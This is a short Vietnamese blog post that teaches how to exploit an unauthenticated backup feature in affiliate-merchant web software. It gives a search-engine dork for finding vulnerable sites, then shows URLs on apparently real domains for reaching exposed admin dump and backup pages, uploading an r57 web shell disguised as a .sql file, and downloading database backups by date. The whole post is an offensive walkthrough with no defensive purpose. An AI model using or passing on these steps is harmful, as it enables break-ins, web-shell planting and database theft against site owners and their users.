Bug backup và cách khai thác

Bug này khá nguy hiểm tuy cũ nhưng vẫn còn nhiều side dính .Google seachCode:
allinurl: "index.php?Act=Merchants"
kết quả khá nhiều , thử con

Code:
http://www.zepub.com/index.php?Act=Merchants
Bây giờ ta thay index.php?Act=Merchants bằng /admin/dump


Code:
http://www.zepub.com/admin/dump
Ơ dính rồi kìa.Giữ lấy trang này bây giờ thử newtab và thay Nhớ lấy cái ngày thắng nó rất quan trọng đấy ./admin/dump bằng admin/backupstart.php coi nào

Hô hô ra cái j` thế này


Code:
http://www.zepub.com/admin/backupstart.php
Có chỗ upload kìa thử up con shell r57 lên coi thế nào. Chú ý đổi con shell thành r57.php.sql hoặc r57.sql tùy theo side mà thay. Con shell tớ up lên.


Code:
http://www.zepub.com/admin/dump/r57kilo.sql
Ơ kìa sao con shell lại như thế này nhỉ? Chả hiểu nổi , ai giải thích giùm với.

Thử cách khác vậy.
Thử down load cái nó back up coi ntn dùng /admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql

Code:
 http://www.affiliation01.com/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql
dd-mm-yyyy.sql thay bằng ngày tháng bạn thấy ở phía dưới

ok đến đây thôi nhé.

Share:

0 nhận xét